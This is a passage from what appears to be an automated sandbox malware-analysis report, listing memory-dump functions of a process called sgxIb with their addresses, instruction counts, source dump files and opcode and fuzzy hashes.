                                        • Source File: 0000001C.00000002.4158167785.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_177d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction ID: 58ace665a91b08deba2c47715aa1d127dd69af7cb1bea7294705a6c562994c6c
                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction Fuzzy Hash: 6111BB75504280DFDB12CF54D5C4B55FFA2FB84314F24C6AADD494B266C33AE44ACB62
                                        Function 0177D02B Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4158167785.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_177d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction ID: 3dfacf18e590c8a7b6acc5b9fbec4e4ca42329671f6b6afd47766d0d66061843
                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction Fuzzy Hash: DA11BB75504284CFDB22CF58D5C4B15FFA1FB84314F28C6AAD8494B656C33AD45ACB62
                                        Function 068F16F1 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eaf02082127164f2c8ce3f421892031571364286e5a4f0d44384377916c0faa
                                        • Instruction ID: 066b8eae6ba6a6466b60b6904490d473a2262f75e434aff8675e6b7f660053ba
                                        • Opcode Fuzzy Hash: 5eaf02082127164f2c8ce3f421892031571364286e5a4f0d44384377916c0faa
                                        • Instruction Fuzzy Hash: D611C674614340CFD3A48B28D48C52ABBB2BB49704B04899ED5CBC3649D771E801CB80
                                        Function 068F0C04 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0080e404485e06bf7bc6f7a2dc2ec13f14b4f8d0f11e2662683a5fa796601510
                                        • Instruction ID: 5cdd13a92f150575e693c3e2a6fc000b162ff820729c69cb4ac50633b8e6b642
                                        • Opcode Fuzzy Hash: 0080e404485e06bf7bc6f7a2dc2ec13f14b4f8d0f11e2662683a5fa796601510
                                        • Instruction Fuzzy Hash: 8301B574624700CFD3A48B29C58C53BBBF6FB88B14F04891DE68BC2608DB71E801CB90
                                        Function 068F193A Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e5b8b8b8f67e46fa8fd930ca5040d19d1f9de4b79e91ee0a9312823426e0fb0
                                        • Instruction ID: 02aa1e9864a16157e88d02fec112eb80232ff5bf526dc420a57377007809d0f8
                                        • Opcode Fuzzy Hash: 0e5b8b8b8f67e46fa8fd930ca5040d19d1f9de4b79e91ee0a9312823426e0fb0
                                        • Instruction Fuzzy Hash: 58F06D70E04704EFCB318FA8980449AFBF5EF4971075489AAE5D5C3200DB319918CBD1
                                        Function 068F0838 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc37050ea5ff3026b5a8bdb5139445b8bfee03252ed7136da64ff3161802b024
                                        • Instruction ID: a5d18e8343a8a2dc35fe0dfea28e0ef82ca79f2a35fcbd3b80d2800f066f0c21
                                        • Opcode Fuzzy Hash: fc37050ea5ff3026b5a8bdb5139445b8bfee03252ed7136da64ff3161802b024
                                        • Instruction Fuzzy Hash: B4F0A7317542008FC3559F19985845ABBB6FFC961031544EEE18DC7312DF21DC068391
                                        Function 068F1948 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91d44f721df9124c064e31073bec3bba640f24a5bc8f365834aaa3a2f917da6d
                                        • Instruction ID: 967ed53e5c043df72017b33a9f06ef6cd3a9dae3acb14058bbcf0111402fc90b
                                        • Opcode Fuzzy Hash: 91d44f721df9124c064e31073bec3bba640f24a5bc8f365834aaa3a2f917da6d
                                        • Instruction Fuzzy Hash: 2AF03075E10714EF8B34CFA9D80449EFBF9EF48620B40856AE695D3600D771E914CBD0
                                        Function 068F0E52 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 820726a23cdc8e548130a685dc377c49c0e93c76a6568a47fa39771c6ad3a088
                                        • Instruction ID: 7dd8a1f7030c71df24756e1f4fcc3468f80420eec56c8425f6123fd51ac93507
                                        • Opcode Fuzzy Hash: 820726a23cdc8e548130a685dc377c49c0e93c76a6568a47fa39771c6ad3a088
                                        • Instruction Fuzzy Hash: AEF08C74244346CFE3059F60EA59A683BA7EB4A305F0444A6DA814B3C5E63A4C10CF12
                                        Function 068F1C60 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab8450fe3db039607d99c85ef8b39e0592fd8fcd60b70f734647f8c0a97414d7
                                        • Instruction ID: c725d1c20a9108af7b8fd0e07ce5139c3339de3611e9e116569d77e5b2bd48db
                                        • Opcode Fuzzy Hash: ab8450fe3db039607d99c85ef8b39e0592fd8fcd60b70f734647f8c0a97414d7
                                        • Instruction Fuzzy Hash: FBE0863605924C8FC7929F6CD840891BFF8AF1570034548A7D2C0CF112E6259865D791
                                        Function 068F0E60 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1201ea824d06516a566a640eface70a555f7631d5ed3a8b696c317bb1d805ccc
                                        • Instruction ID: 9878e138630ee31446a292b1f82f76b824ffec32692f3f6cd3a9a4c04c806c2a
                                        • Opcode Fuzzy Hash: 1201ea824d06516a566a640eface70a555f7631d5ed3a8b696c317bb1d805ccc
                                        • Instruction Fuzzy Hash: BEE01A7424020ACFE708AF51FB1EB6937ABE788305F008035DA15473C4E67A5811CF12
                                        Function 068F16C0 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4cea6d0ea3d424583b289d9eb2c5335255ffe5c3eb98a15154a748dc0d5fab2d
                                        • Instruction ID: 502fb4bcc3c4e94d0cfa5bf5e561d5e339ff7e31bc57b80c1c9e872330994480
                                        • Opcode Fuzzy Hash: 4cea6d0ea3d424583b289d9eb2c5335255ffe5c3eb98a15154a748dc0d5fab2d
                                        • Instruction Fuzzy Hash: C8D0222125912417E70433E8A0212ED268A8F81618F0104A7C19CCB282CC8B8C8247EB
                                        Function 068F1B12 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48f833bf4cbf9f9baeb3baf594a334dbcb74ccd40480936975df1f2b5f9e4585
                                        • Instruction ID: 5d802a12ade51d946eb5116980448fe036e8d7ad1ab6fa2a59b0f4f94b5d90fe
                                        • Opcode Fuzzy Hash: 48f833bf4cbf9f9baeb3baf594a334dbcb74ccd40480936975df1f2b5f9e4585
                                        • Instruction Fuzzy Hash: E9C0803236052813D614225C74205FD739E47C4575F500057D14C87A418D814C8302EF
                                        Function 068F16D0 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69348b1ecd25a265ed9cf26f8389ac4f779188e1c937efec0bc852fb7e1edce3
                                        • Instruction ID: ceb810dbf675686b7465798c4aac54e30ea2c9a6277ebe56d1e16740c70b0f72
                                        • Opcode Fuzzy Hash: 69348b1ecd25a265ed9cf26f8389ac4f779188e1c937efec0bc852fb7e1edce3
                                        • Instruction Fuzzy Hash: DAB09B6131413517DA48719D64205BE728D47C5665F100067D61DC7741CCD59C4142EF
                                        Function 068F1B18 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5a89945cea1ab417cf2b2b4729e0da2638e685a0b846c5860c83ed76f0e3085
                                        • Instruction ID: 1867f8ec9188d57ba03018ca49d9835e5ec9d071fcf8f9dbaaf1eb32377de951
                                        • Opcode Fuzzy Hash: f5a89945cea1ab417cf2b2b4729e0da2638e685a0b846c5860c83ed76f0e3085
                                        • Instruction Fuzzy Hash: B8B09B2233423917D648319D68305BE728D47C5565F510067961DC77418CC59C4202EF
                                        Function 068F0253 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be3b93aae5fbba2448c8a8656eba385e87b03ac4b0af42429c934f9a7568f59f
                                        • Instruction ID: 30a3aacbf2c80d4a1f40f69f3823fa54aac3c09ed33f508abba24fc4062e8c4d
                                        • Opcode Fuzzy Hash: be3b93aae5fbba2448c8a8656eba385e87b03ac4b0af42429c934f9a7568f59f
                                        • Instruction Fuzzy Hash: 07D0C970D5421ECFEFA28F80C8697EEBBB1BB08319F100419D101E6196CBBE0549CFA0
                                        Function 068F0917 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76a4455803fac150361223fc98ee09bab5264966ec74f5c585d09c6dae259d17
                                        • Instruction ID: fbaae749b289117296908b31e8284ef412145c0e7c8463dd875cae9563cdd176
                                        • Opcode Fuzzy Hash: 76a4455803fac150361223fc98ee09bab5264966ec74f5c585d09c6dae259d17
                                        • Instruction Fuzzy Hash: C3C08C30711A208F8BB0EF28A0600ADB3F0BB48120300190AE26AC2680CB3199058782
                                        Function 068F08E0 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b42f2263303bc1b7103d0d80780a084c3faae39645c668fd72608df1b15058bf
                                        • Instruction ID: 922d14452697551d7d79d3fb1311f1b8cb4ec6f329ce18aa4a2bb56f14b884f4
                                        • Opcode Fuzzy Hash: b42f2263303bc1b7103d0d80780a084c3faae39645c668fd72608df1b15058bf
                                        • Instruction Fuzzy Hash: DCB092A290A2408BEB0656348C0B2482592AFE210075AE6A9828286159ED2B88868386
                                        Function 068F0D52 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82bf0cf34f046b3ccea898644a1c8af9537838994a806bf076345cd7d61c5a1b
                                        • Instruction ID: 36ab4c107406f60d20a5d45e8c88c4f52d2704735f0caf8c98ddd8f2ef66f0d0
                                        • Opcode Fuzzy Hash: 82bf0cf34f046b3ccea898644a1c8af9537838994a806bf076345cd7d61c5a1b
                                        • Instruction Fuzzy Hash: F7C04CB46007109F8370DF29E4488577BF5FB886103004E19F456C2608C770E8458A90
                                        Function 068F0349 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30a303dd466e1d60cb691fd0f0b68446006a3ce5fa136262088e545e4229ed44
                                        • Instruction ID: 371a63c68461f18373d4de3538a3dcffc76b26d55640ad2d8158bf9e62a500b7
                                        • Opcode Fuzzy Hash: 30a303dd466e1d60cb691fd0f0b68446006a3ce5fa136262088e545e4229ed44
                                        • Instruction Fuzzy Hash: 4BC012B04006008EDF18DF54C4482207AA0AB08328B30028CD16A0A2D2C332C183CBD0